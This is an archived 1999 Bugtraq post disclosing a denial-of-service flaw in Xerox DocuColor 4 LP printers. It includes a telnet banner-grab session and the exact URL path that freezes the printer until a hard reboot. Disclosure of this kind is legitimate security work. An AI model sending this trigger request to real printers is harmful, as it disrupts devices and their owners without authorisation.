[12239] in bugtraq
Xerox DocuColor 4 LP D.O.S
daemon@ATHENA.MIT.EDU (Jason Lutz)
Wed Oct 13 21:19:09 1999
Mime-Version: 1.0
Content-Type: multipart/alternative;
boundary="----=_NextPart_000_004B_01BF1567.52EAD640"
Message-Id: <004e01bf1599$9d960f20$359b95d1@spis.net>
Date: Wed, 13 Oct 1999 10:40:10 -0600
Reply-To: Jason Lutz <jason@SPIS.NET>
From: Jason Lutz <jason@SPIS.NET>
X-To: bugtraq@securityfocus.com
To: BUGTRAQ@SECURITYFOCUS.COM
This is a multi-part message in MIME format.
------=_NextPart_000_004B_01BF1567.52EAD640
Content-Type: text/plain;
charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable
BugTraq,
I have found several bugs with XEROX network printers/copiers the =
first I would like to share with you is the DocuColor 4 LP Denial of =
Service attack. This attack can case the XEROX printer to become =
completely unresponsive to pings and will not allow any thing to be =
printed unless you give it a hard reboot. Worst of all you can do this =
from any workstation that has access to the Fiery web based tools. This =
can give your local XEROX guys fits.
=20
[root@ns2 whis]# telnet x.x.x.x 80
Trying x.x.x.x ...
Connected to x.x.x.x
Escape character is '^]'.
GET / HTTP/1.0
HTTP/1.0 200 OK
Date: THU, 01 JAN 1970 GMT
Server: Apache/1.0.3
Content-type: text/html
[root@ns2 whis]# Connection closed by foreign host.
Great now here's the D.O.S HTTP://DocuColor/around2000dots/ and the =
printer will have to be reset if you want to use it.
I would like to say thank you to rain.forest.puppy.
Jason Lutz
Sprint Print Inc
jason@spis.net
------=_NextPart_000_004B_01BF1567.52EAD640
Content-Type: text/html;
charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML><HEAD>
<META content=3D"text/html; charset=3Diso-8859-1" =
http-equiv=3DContent-Type>
<META content=3D"MSHTML 5.00.2614.3500" name=3DGENERATOR>
<STYLE></STYLE>
</HEAD>
<BODY bgColor=3D#ffffff>
<DIV><FONT size=3D2>
<DIV><FONT size=3D2>
<DIV> BugTraq,</DIV>
<DIV> </DIV>
<DIV> I have found several bugs with XEROX network =
printers/copiers=20
the first I would like to share with you is the DocuColor 4 LP Denial of =
Service=20
attack. This attack can case the XEROX printer to become completely =
unresponsive=20
to pings and will not allow any thing to be printed unless you give it a =
hard=20
reboot. Worst of all you can do this from any workstation that has =
access to the=20
Fiery web based tools. This can give your local XEROX guys fits.</DIV>
<DIV>
<DIV><FONT size=3D2>
<DIV><FONT size=3D2></FONT> </DIV>
<DIV><FONT size=3D3>[root@ns2 whis]# telnet x.x.x.x 80<BR>Trying x.x.x.x =
...<BR>Connected to x.x.x.x</FONT></DIV>
<DIV><FONT size=3D3>Escape character is '^]'.<BR>GET / =
HTTP/1.0</FONT></DIV>
<DIV> </DIV>
<DIV><FONT size=3D3>HTTP/1.0 200 OK<BR>Date: THU, 01 JAN 1970 =
GMT<BR>Server:=20
Apache/1.0.3<BR>Content-type: text/html</FONT></DIV>
<DIV> </DIV>
<DIV><FONT size=3D3><FONT size=3D2><FONT size=3D3>[root@ns2 whis]# =
Connection closed=20
by foreign host.</FONT></FONT></FONT></DIV>
<DIV> </DIV>
<DIV><FONT size=3D3>Great now here's the D.O.S <A=20
href=3D"http://DocuColor/around2000dots/">HTTP://DocuColor/around2000dots=
/</A> and=20
the printer will have to be reset if you want to use it.</FONT></DIV>
<DIV> </DIV>
<DIV><FONT size=3D3>I would like to say thank you to=20
rain.forest.puppy.</FONT></DIV>
<DIV> </DIV>
<DIV><FONT size=3D3>Jason Lutz</FONT></DIV>
<DIV><FONT size=3D3>Sprint Print Inc</FONT></DIV>
<DIV><FONT size=3D3><A=20
href=3D"mailto:jason@spis.net">jason@spis.net</A></FONT></DIV>
<DIV> </DIV>
<DIV> </DIV></FONT></DIV></DIV></FONT></DIV></FONT></DIV></BODY></HT=
ML>
------=_NextPart_000_004B_01BF1567.52EAD640--
